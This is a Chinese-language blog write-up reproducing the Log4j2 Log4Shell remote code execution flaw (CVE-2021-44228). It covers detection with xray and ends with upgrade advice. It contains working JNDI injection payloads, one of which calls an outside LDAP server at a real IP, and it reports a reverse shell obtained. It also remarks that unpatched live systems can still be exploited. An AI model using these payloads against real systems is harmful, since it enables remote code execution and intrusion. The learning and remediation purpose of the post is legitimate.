2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。
漏洞描述及影响
log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。Apache Log4j2 组件在开启了日志记录功能后,凡是在可触发错误记录日志的地方,插入漏洞利用代码,即可利用成功。特殊情况下,若该组件记录的日志包含其他系统的记录日志,则有可能造成间接投毒。通过中间系统,使得组件间接读取了具有攻击性的漏洞利用代码,亦可间接造成漏洞触发。
同时该漏洞还影响很多全球使用量的Top序列的通用开源组件,例如 Apache Struts2、Apache Solr、Apache Druid、Apache Flink等
复现
![](https://img-blog.csdnimg.cn/44edb5e56a9c4c2e918baa5ede945b79.png)
通过以上配置,走burp的流量,就会被动检测(不怎么好用)通过检测结果进行下一步操
![](https://img-blog.csdnimg.cn/76de128268df468680371a0287659bed.png)
启动语句 nohup ./xray_linux_amd64 reverse &
2. 客户端配置
扫描结果
利用方法
![](https://img-blog.csdnimg.cn/264b8af181934924b1534b52d58f5d37.png)
使用payload测试是否是误报 ${jndi:ldap://ffba3d51.dnslog.rest}
实操
![](https://img-blog.csdnimg.cn/65bee888aff4477fb50f309d2915f429.png)
![](https://img-blog.csdnimg.cn/65a73b42bce24f5bafbeabffbb1db321.png)
4. 或使用${jndi:ldap://120.48.81.134:1389/Basic/TomcatEcho}并在请求体写入
![](https://img-blog.csdnimg.cn/d136330e6da54868bb9e6f7becea9587.png)
以上可以看到反弹shell,成功上线。
修复
从前面的分析验证可以看出,该漏洞可直接加载远程代码,反弹shell,危害巨大。需将log4j2的jar包升级为2.17-rc2及以上